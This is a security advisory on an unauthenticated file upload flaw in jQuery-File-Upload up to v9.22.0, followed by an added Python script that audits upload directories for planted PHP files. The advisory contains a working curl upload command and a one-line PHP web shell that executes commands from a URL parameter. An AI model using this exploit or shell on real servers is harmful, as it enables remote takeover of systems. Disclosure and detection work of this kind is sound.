Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
Vendor Notified: 2018-10-09
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution.
This has been actively exploited in the wild for over a year.
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
Where shell.php is:
<?php $cmd=$_GET['cmd']; system($cmd);?>
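Since the advisory reports exploitation in the wild, a defender-side check is to audit the handler's upload directory for files the web server could execute. The script below is an added example, not code from the advisory or from the jQuery-File-Upload project; the extension list, the function names and the sample files are assumptions constructed for illustration, and the directory to scan is whatever your deployment uses.

```python
import os
import re
import tempfile

# Extensions commonly mapped to the PHP interpreter (assumed list; match it to your server config).
EXEC_EXT = re.compile(r"\.(php[0-9]?|phtml|pht|phar)(\.|$)", re.IGNORECASE)
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)


def audit_upload_dir(upload_dir, head_bytes=65536):
    """Return sorted (relative_path, reason) pairs for suspicious files."""
    findings = []
    for root, _dirs, names in os.walk(upload_dir):
        for name in names:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, upload_dir)
            if name.lower() == ".htaccess":
                findings.append((rel, "handler-override"))
            elif EXEC_EXT.search(name):
                # Catches shell.php, mixed case, and double extensions such as x.php.jpg
                findings.append((rel, "executable-extension"))
            else:
                with open(path, "rb") as fh:
                    if PHP_TAG.search(fh.read(head_bytes)):
                        findings.append((rel, "php-code-in-content"))
    return sorted(findings)


def build_constructed_sample(base):
    """Write constructed sample files (not real uploads) for a dry run."""
    samples = {
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        "shell.php": b"<?php /* constructed placeholder */ ?>",
        "Report.PhP.jpg": b"not an image",
        "thumbnail/avatar.png": b"\x89PNG\r\n\x1a\n<?php /* constructed */ ?>",
        "notes.txt": b"plain text",
    }
    for rel, data in samples.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_sample(tmp)
        for rel, reason in audit_upload_dir(tmp):
            print(f"{reason:22} {rel}")
```

Point `audit_upload_dir` at the real upload directory in place of the constructed sample; any finding there warrants checking web server access logs for requests to that file.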